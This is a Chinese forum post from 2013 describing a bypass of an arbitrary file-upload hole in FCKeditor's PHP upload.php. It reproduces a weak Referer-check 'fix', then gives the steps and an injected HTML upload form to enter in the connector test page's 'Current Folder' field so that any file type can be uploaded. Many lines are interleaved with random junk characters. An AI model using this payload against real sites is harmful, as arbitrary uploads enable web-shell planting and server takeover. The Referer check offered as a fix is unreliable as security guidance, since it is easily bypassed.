漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php2 S( b8 G% \2 y, K8 I" W# W
网上给出的修复方案是( v$ u0 K% U) I* T& d" U
修复方法,删除FCK编辑器用其他的编辑器( }1 P3 B% m! P
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
6 _) K) c% S" ^在8 C, A. ~3 ]$ o5 F0 J
require(‘config.php’);5 G/ z9 {. @) [: |
require(‘util.php’);
& J& R/ P: A$ q" g1 Y& z1 n5 k的下面添加以下代码—————————–8 B0 j; b& n) K, K8 j5 l
//防止外部提交& V& S/ g7 J2 u' g! o. `3 b
function outsidepost()
9 O. b& e4 T6 R8 z{1 s) i u. d& t7 @! C1 q
$servername=$_SERVER['SERVER_NAME'];: n4 E# f7 S* F# e. ?
$sub_from=@$_SERVER['HTTP_REFERER'];9 W" C- p: P) y q4 q/ Y+ U
$sub_len=strlen($servername);- N) j" R0 [6 o2 B3 `: P J
$checkfrom=substr($sub_from,7,$sub_len);
) U- H% }4 k# {1 kif($checkfrom!=$servername){, e* J9 n/ Z9 a6 [5 B5 W- _3 N
echo(“you don’t outsidepost!”);
! T2 C1 W, {& G e0 `# eexit;
6 V* h1 H! x( M2 W}
& v* I8 H) X9 v9 Z}
4 m- `% m/ ^! s) ]outsidepost();1 Y- V$ _ j$ ~2 G
防止外部提交,但是没有防止内部提交,
5 @: R0 \+ \3 X. @2 O+ d利用方法:8 J" y6 A: n. b. v, ?0 V8 `5 |
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
( n; k* X4 c, s! J# \0 M1 `2,在Current Folder 框输入2 s5 O+ N& w7 S* b! j
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
~4 \3 k( s9 D5 H' W然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
6 c: X, ^5 C2 g& e$ uPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对